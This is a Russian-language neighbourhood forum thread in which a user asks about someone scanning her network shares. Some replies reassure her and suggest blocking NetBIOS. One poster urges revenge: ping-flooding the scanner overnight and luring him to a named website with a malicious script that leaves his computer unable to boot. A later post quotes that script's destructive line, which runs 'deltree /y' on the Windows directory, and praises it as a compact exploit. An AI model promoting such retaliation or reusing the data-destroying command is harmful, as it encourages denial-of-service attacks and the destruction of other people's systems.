Перейти к публикации
Форум района Строгино

я не скажу кто меня задолбал


Рекомендованные сообщения

если есть вопросы - задавайте,а я попробую понятно и доступно обьяснить,как оно работает,и как от кого избавится :) Тот,кто не будет надоедать - тому могу халявный инет устроить :))

Ссылка на сообщение

Что ты неравничаешь?

Чел сканирует расшареные ресурсы сети. Это нормально. Как иначе их найти все??

Лично у меня нетбиос просто заблокирован. Нафига он нужен когда все на фтп лежит?

Ссылка на сообщение
Что ты неравничаешь?

Чел сканирует расшареные ресурсы сети. Это нормально. Как иначе их найти все??

Лично у меня нетбиос просто заблокирован. Нафига он нужен когда все на фтп лежит?

лох будет нервничать, если у него прыщ вскочить, а он подумает что это чума бубонная...

 

так и я. просто не знаю, что это...а лучше перестраховаться...

на этом компе, кроме меня, еще моя мама. ей инет нужен почти каждый день. и если хоть че случиться, виновата - я. поэтому....думаю, меня можно понять.

 

пасиба за информацию ^_^

 

зы. но это уже длится больше часа....странно все-таки

Ссылка на сообщение

Ерунда это все. Если так уж неприятно - заблокируй нетбиос (если конечно он не нужен). То есть если ты не пользуешься расшареными ресурсами.

 

Просто этот "хацкер" какойто сканер использует кривой. По всем портам сканирует.... Ботинок...

Ссылка на сообщение

а ты его в ответ тоже посканируй... поставь его на ночь пинговатся 10тимегабитными пакетами :) он оценит твое внимание :)

 

 

или замани его на сайтик с вредоносным скриптом - он туда зайдет,потом ком перезагрузит,а потом он больше не включится... я для образца собрал www.cputest.nm.ru тока сами туда не зайдите... а то будет как я написал :)

Ссылка на сообщение
а ты его в ответ тоже посканируй... поставь его на ночь пинговатся 10тимегабитными пакетами :) он оценит твое внимание :)

 

 

или замани его на сайтик с вредоносным скриптом - он туда зайдет,потом ком перезагрузит,а потом он больше не включится... я для образца собрал www.cputest.nm.ru тока сами туда не зайдите... а то будет как я написал :)

 

А в опере действует? :D :D

Ссылка на сообщение
а ты его в ответ тоже посканируй... поставь его на ночь пинговатся 10тимегабитными пакетами :) он оценит твое внимание :)

 

 

или замани его на сайтик с вредоносным скриптом - он туда зайдет,потом ком перезагрузит,а потом он больше не включится... я для образца собрал www.cputest.nm.ru тока сами туда не зайдите... а то будет как я написал :)

 

А в опере действует? :D :D

 

а проверь :) я вобще бяку под ИЕ делал,но может и оперу проймет :)

Ссылка на сообщение
...wsh.Run('start m deltree /y c:windows')...
А у меня нету диска C:, что мне делать? :)

А ещё нету ни f: ни e: ни остальных других. Денег не хватило :)

А вообще мне понравилось. Компактный получился эксплойтик.

Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас
×
×
  • Создать...
Яндекс.Метрика